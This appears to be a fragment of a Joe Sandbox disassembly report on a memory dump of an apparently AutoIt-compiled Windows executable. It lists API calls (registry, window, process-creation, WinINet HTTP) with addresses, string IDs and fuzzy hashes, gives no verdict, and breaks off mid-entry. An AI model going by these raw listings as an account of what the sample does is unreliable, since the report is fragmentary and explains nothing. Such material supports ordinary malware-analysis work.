• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: Value$Close$_wcslen$ConnectCreateRegistry
• String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
• API String ID: 9721498-966354055
• Opcode ID: 84df86b94b29b21aca55e4e633e1242678792e9f6b77bf1e9f54dcd7fa87fa9b
• Instruction ID: 1ce1630fde55d646763f2d78105039030341f46511ca7d62055e590f0b7f8938
• Opcode Fuzzy Hash: 84df86b94b29b21aca55e4e633e1242678792e9f6b77bf1e9f54dcd7fa87fa9b
• Instruction Fuzzy Hash: 0D1225756042019FD754DF24C891F2AB7E5EF88724F14889DF88A9B2A2DB31ED41CB86
APIs
• CharUpperBuffW.USER32(?,?), ref: 00A509C6
• _wcslen.LIBCMT ref: 00A50A01
• SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00A50A54
• _wcslen.LIBCMT ref: 00A50A8A
• _wcslen.LIBCMT ref: 00A50B06
• _wcslen.LIBCMT ref: 00A50B81
  • Part of subcall function 009DF9F2: _wcslen.LIBCMT ref: 009DF9FD
  • Part of subcall function 00A22BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00A22BFA
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: _wcslen$MessageSend$BuffCharUpper
• String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
• API String ID: 1103490817-4258414348
• Opcode ID: 92e7a40f9ffb91c6a1853f6a845124017625150860b313a7ba861d98c07363ab
• Instruction ID: 8f28ad8852a10f534b199eff2941f5e2d7b9fd53dd699ba18fbabcd90ff1e1e7
• Opcode Fuzzy Hash: 92e7a40f9ffb91c6a1853f6a845124017625150860b313a7ba861d98c07363ab
• Instruction Fuzzy Hash: 9FE18B326087019FCB14EF24C490E2AB7E2BFD8355B15895DF8969B362D730ED49CB82
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: _wcslen$BuffCharUpper
• String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
• API String ID: 1256254125-909552448
• Opcode ID: 818b5e59ffda9bfa50b359b822f0ae3b8eb8849cba4e2f7f187787a9fe4e7208
• Instruction ID: 3bb71bca32dccb5d28c102bdac17b7014bbda67eea194a52e296b2c7cbfe0291
• Opcode Fuzzy Hash: 818b5e59ffda9bfa50b359b822f0ae3b8eb8849cba4e2f7f187787a9fe4e7208
• Instruction Fuzzy Hash: 7071F83660116A8BCB50DF78CD516BE33A2AFE07B4B254528F85AA7285EA31CD45C790
APIs
• _wcslen.LIBCMT ref: 00A5835A
• _wcslen.LIBCMT ref: 00A5836E
• _wcslen.LIBCMT ref: 00A58391
• _wcslen.LIBCMT ref: 00A583B4
• LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00A583F2
• LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00A55BF2), ref: 00A5844E
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A58487
• LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00A584CA
• LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00A58501
• FreeLibrary.KERNEL32(?), ref: 00A5850D
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00A5851D
• DestroyIcon.USER32(?,?,?,?,?,00A55BF2), ref: 00A5852C
• SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00A58549
• SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00A58555
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
• String ID: .dll$.exe$.icl
• API String ID: 799131459-1154884017
• Opcode ID: bd8df81fdec29635196209b11af4e99d69b936f774e107be690d8c969af4d533
• Instruction ID: 80fed713e2fe7086fdebcd69bf4b6a17f90ae9b48eea1630be96224f0b8f0c6c
• Opcode Fuzzy Hash: bd8df81fdec29635196209b11af4e99d69b936f774e107be690d8c969af4d533
• Instruction Fuzzy Hash: 6D61D171940315BEEB14DFA4CC41BBE77B8BB48B22F104509FC15EA1D1EB78A984CBA0
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 0-1645009161
                                                                      • Opcode ID: 42707364994dc05b69557b8970cf1456a0eee0fc30f69bd93add96992b04d5d9
                                                                      • Instruction ID: e0ffa0bb5af31cc60073e1eeb7dc8a838bc8b2361831460aab7bd0e68ef28421
                                                                      • Opcode Fuzzy Hash: 42707364994dc05b69557b8970cf1456a0eee0fc30f69bd93add96992b04d5d9
                                                                      • Instruction Fuzzy Hash: 4981F871E40209BBDB11BFA0DD53FAF7768BF55300F044429F905AA196EB70DA15CBA2
                                                                      APIs
                                                                      • LoadIconW.USER32(00000063), ref: 00A25A2E
                                                                      • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00A25A40
                                                                      • SetWindowTextW.USER32(?,?), ref: 00A25A57
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00A25A6C
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00A25A72
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00A25A82
                                                                      • SetWindowTextW.USER32(00000000,?), ref: 00A25A88
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00A25AA9
                                                                      • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00A25AC3
                                                                      • GetWindowRect.USER32(?,?), ref: 00A25ACC
                                                                      • _wcslen.LIBCMT ref: 00A25B33
                                                                      • SetWindowTextW.USER32(?,?), ref: 00A25B6F
                                                                      • GetDesktopWindow.USER32 ref: 00A25B75
                                                                      • GetWindowRect.USER32(00000000), ref: 00A25B7C
                                                                      • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00A25BD3
                                                                      • GetClientRect.USER32(?,?), ref: 00A25BE0
                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 00A25C05
                                                                      • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00A25C2F
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                      • String ID:
                                                                      • API String ID: 895679908-0
                                                                      • Opcode ID: fa83756a5a39b9df32c6633235ed83a5dda347cf1be22c9a55976dab7f670f47
                                                                      • Instruction ID: 87e1d2ee05d9cb7d1c738671dbdd6c1d5dce576b4592e904f9e2ec63fc73edd0
                                                                      • Opcode Fuzzy Hash: fa83756a5a39b9df32c6633235ed83a5dda347cf1be22c9a55976dab7f670f47
                                                                      • Instruction Fuzzy Hash: 06718C31900B19AFDB20DFB8DE89AAEBBF5FF48715F104528E542A25A0E774E944CB50
                                                                      APIs
                                                                      • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 009E00C6
                                                                        • Part of subcall function 009E00ED: InitializeCriticalSectionAndSpinCount.KERNEL32(00A9070C,00000FA0,8C8D3FFC,?,?,?,?,00A023B3,000000FF), ref: 009E011C
                                                                        • Part of subcall function 009E00ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00A023B3,000000FF), ref: 009E0127
                                                                        • Part of subcall function 009E00ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,00A023B3,000000FF), ref: 009E0138
                                                                        • Part of subcall function 009E00ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 009E014E
                                                                        • Part of subcall function 009E00ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 009E015C
                                                                        • Part of subcall function 009E00ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 009E016A
                                                                        • Part of subcall function 009E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009E0195
                                                                        • Part of subcall function 009E00ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 009E01A0
                                                                      • ___scrt_fastfail.LIBCMT ref: 009E00E7
                                                                        • Part of subcall function 009E00A3: __onexit.LIBCMT ref: 009E00A9
                                                                      Strings
                                                                      • WakeAllConditionVariable, xrefs: 009E0162
                                                                      • InitializeConditionVariable, xrefs: 009E0148
                                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 009E0122
                                                                      • SleepConditionVariableCS, xrefs: 009E0154
                                                                      • kernel32.dll, xrefs: 009E0133
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                      • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                      • API String ID: 66158676-1714406822
                                                                      • Opcode ID: 71d5733b14e2188b41e36f7aa039e6eb4ffc3dbacdeb4980cbbcbbeae83f85ff
                                                                      • Instruction ID: e719fa3a6ba59ce057b94b490cce879099357981a7a31118e85496acac121cbd
                                                                      • Opcode Fuzzy Hash: 71d5733b14e2188b41e36f7aa039e6eb4ffc3dbacdeb4980cbbcbbeae83f85ff
                                                                      • Instruction Fuzzy Hash: 5521FC33648B507FD7129BF5AC06F2A37A8FB85F76F000526F801A7295DFB45C418A90
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen
                                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                      • API String ID: 176396367-1603158881
                                                                      • Opcode ID: c88866170a1acffe078e4feac180023396bd30204c205af459650e1bc5409953
                                                                      • Instruction ID: 77877c09a0fc223bb5682bdc3803edd0e66199dd83fee120e16cb85f984821db
                                                                      • Opcode Fuzzy Hash: c88866170a1acffe078e4feac180023396bd30204c205af459650e1bc5409953
                                                                      • Instruction Fuzzy Hash: 77E1D233E00526ABCF14EFBCD451BEDBBB0BF55750F14816AE856A7240DB34AE858790
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(00000000,00000000,00A5CC08), ref: 00A34527
                                                                      • _wcslen.LIBCMT ref: 00A3453B
                                                                      • _wcslen.LIBCMT ref: 00A34599
                                                                      • _wcslen.LIBCMT ref: 00A345F4
                                                                      • _wcslen.LIBCMT ref: 00A3463F
                                                                      • _wcslen.LIBCMT ref: 00A346A7
                                                                        • Part of subcall function 009DF9F2: _wcslen.LIBCMT ref: 009DF9FD
                                                                      • GetDriveTypeW.KERNEL32(?,00A86BF0,00000061), ref: 00A34743
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: _wcslen$BuffCharDriveLowerType
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2055661098-1000479233
                                                                      • Opcode ID: 2db4dd6d639bc36fa8d982d8ea4295d56fde02e6ed70823d656c903bdf013c44
                                                                      • Instruction ID: ebd115208ffa86db22a30e6b44368660d50c60515fae1c2f5a8e406ff8806893
                                                                      • Opcode Fuzzy Hash: 2db4dd6d639bc36fa8d982d8ea4295d56fde02e6ed70823d656c903bdf013c44
                                                                      • Instruction Fuzzy Hash: D9B1DF71A083029FC710EF28C891A6AB7E5BFE9764F50491DF496C7291E730ED45CBA2
                                                                      APIs
                                                                      • _wcslen.LIBCMT ref: 00A4B198
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A4B1B0
                                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00A4B1D4
                                                                      • _wcslen.LIBCMT ref: 00A4B200
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A4B214
                                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00A4B236
                                                                      • _wcslen.LIBCMT ref: 00A4B332
                                                                        • Part of subcall function 00A305A7: GetStdHandle.KERNEL32(000000F6), ref: 00A305C6
                                                                      • _wcslen.LIBCMT ref: 00A4B34B
                                                                      • _wcslen.LIBCMT ref: 00A4B366
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00A4B3B6
                                                                      • GetLastError.KERNEL32(00000000), ref: 00A4B407
                                                                      • CloseHandle.KERNEL32(?), ref: 00A4B439
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4B44A
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4B45C
                                                                      • CloseHandle.KERNEL32(00000000), ref: 00A4B46E
                                                                      • CloseHandle.KERNEL32(?), ref: 00A4B4E3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                      • String ID:
                                                                      • API String ID: 2178637699-0
                                                                      • Opcode ID: 2a71da4ca9ba7d5ea7f8646c3bfe062c0c2262045636c0b7843366659aab469b
                                                                      • Instruction ID: 6c26bff94c08d091aef4a70341c4f3f02f36ad61ebfc1392c16832ab546faed9
                                                                      • Opcode Fuzzy Hash: 2a71da4ca9ba7d5ea7f8646c3bfe062c0c2262045636c0b7843366659aab469b
                                                                      • Instruction Fuzzy Hash: 75F1AB356183409FC724EF24C891B6EBBE5AFC5710F14895DF8999B2A2CB31EC41CB62
                                                                      APIs
                                                                      • GetMenuItemCount.USER32(00A91990), ref: 00A02F8D
                                                                      • GetMenuItemCount.USER32(00A91990), ref: 00A0303D
                                                                      • GetCursorPos.USER32(?), ref: 00A03081
                                                                      • SetForegroundWindow.USER32(00000000), ref: 00A0308A
                                                                      • TrackPopupMenuEx.USER32(00A91990,00000000,?,00000000,00000000,00000000), ref: 00A0309D
                                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A030A9
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                      • String ID: 0
                                                                      • API String ID: 36266755-4108050209
                                                                      • Opcode ID: a5ca9bf200ad1a453bd4542db6bad71530e23c232555814d1550cf487704eb71
                                                                      • Instruction ID: 84ef5f59820021af7d1b93c876717b9f53a6ba0ec29b3df31ece90cff0056b78
                                                                      • Opcode Fuzzy Hash: a5ca9bf200ad1a453bd4542db6bad71530e23c232555814d1550cf487704eb71
                                                                      • Instruction Fuzzy Hash: 9A71087164031ABFEB258F64EC49FAABF68FF04364F208216F5256A1E0C7B1A910CB51
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?), ref: 00A56DEB
                                                                        • Part of subcall function 009C6B57: _wcslen.LIBCMT ref: 009C6B6A
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00A56E5F
                                                                      • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00A56E81
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A56E94
                                                                      • DestroyWindow.USER32(?), ref: 00A56EB5
                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,009C0000,00000000), ref: 00A56EE4
                                                                      • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00A56EFD
                                                                      • GetDesktopWindow.USER32 ref: 00A56F16
                                                                      • GetWindowRect.USER32(00000000), ref: 00A56F1D
                                                                      • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00A56F35
                                                                      • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00A56F4D
                                                                        • Part of subcall function 009D9944: GetWindowLongW.USER32(?,000000EB), ref: 009D9952
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                       • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                      • String ID: 0$tooltips_class32
                                                                      • API String ID: 2429346358-3619404913
                                                                      • Opcode ID: e7483ba50f5cf9e3d897292a3ec1bb240e40bde79b5501b53093786ebd4a9fc3
                                                                      • Instruction ID: 73e0dacf9506853b05303df2f99ecc27d07c8d02dc0bca734febb91d02649b2a
                                                                      • Opcode Fuzzy Hash: e7483ba50f5cf9e3d897292a3ec1bb240e40bde79b5501b53093786ebd4a9fc3
                                                                      • Instruction Fuzzy Hash: EA716770504345AFDB21CF58DC48FAABBE9FB99315F44091EF98987261CB74A90ACB12
APIs
  • Part of subcall function 009D9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 009D9BB2
• DragQueryPoint.SHELL32(?,?), ref: 00A59147
  • Part of subcall function 00A57674: ClientToScreen.USER32(?,?), ref: 00A5769A
  • Part of subcall function 00A57674: GetWindowRect.USER32(?,?), ref: 00A57710
  • Part of subcall function 00A57674: PtInRect.USER32(?,?,00A58B89), ref: 00A57720
• SendMessageW.USER32(?,000000B0,?,?), ref: 00A591B0
• DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00A591BB
• DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00A591DE
• SendMessageW.USER32(?,000000C2,00000001,?), ref: 00A59225
• SendMessageW.USER32(?,000000B0,?,?), ref: 00A5923E
• SendMessageW.USER32(?,000000B1,?,?), ref: 00A59255
• SendMessageW.USER32(?,000000B1,?,?), ref: 00A59277
• DragFinish.SHELL32(?), ref: 00A5927E
• DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00A59371
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
• String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
• API String ID: 221274066-3440237614
• Opcode ID: 6ac2013c845deb28c438991157a102f08588a278f211c4d3a4e5a79745b2722a
• Instruction ID: 942c3381323ad9ae1e1426f83a75180277cc8c9eec61ee24af82f610333cb10d
• Opcode Fuzzy Hash: 6ac2013c845deb28c438991157a102f08588a278f211c4d3a4e5a79745b2722a
• Instruction Fuzzy Hash: 9A614771508301AFC701EFA4DC89EAFBBE9FBC9750F00092EF595961A1DB309A49CB52
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00A3C4B0
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A3C4C3
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A3C4D7
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00A3C4F0
• InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00A3C533
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00A3C549
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A3C554
• HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00A3C584
• GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00A3C5DC
• SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00A3C5F0
• InternetCloseHandle.WININET(00000000), ref: 00A3C5FB
Memory Dump Source
• Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
• Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
Similarity
• API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
• String ID:
• API String ID: 3800310941-3916222277
• Opcode ID: f52a8fb083119685ca3ba0435197a45932cfc9ef00e702c466bbdea13a81bac6
• Instruction ID: d7940666685ecb6325c42f6cb5b5ec82dff50676df44b6eb6ea8873a9e8a3a74
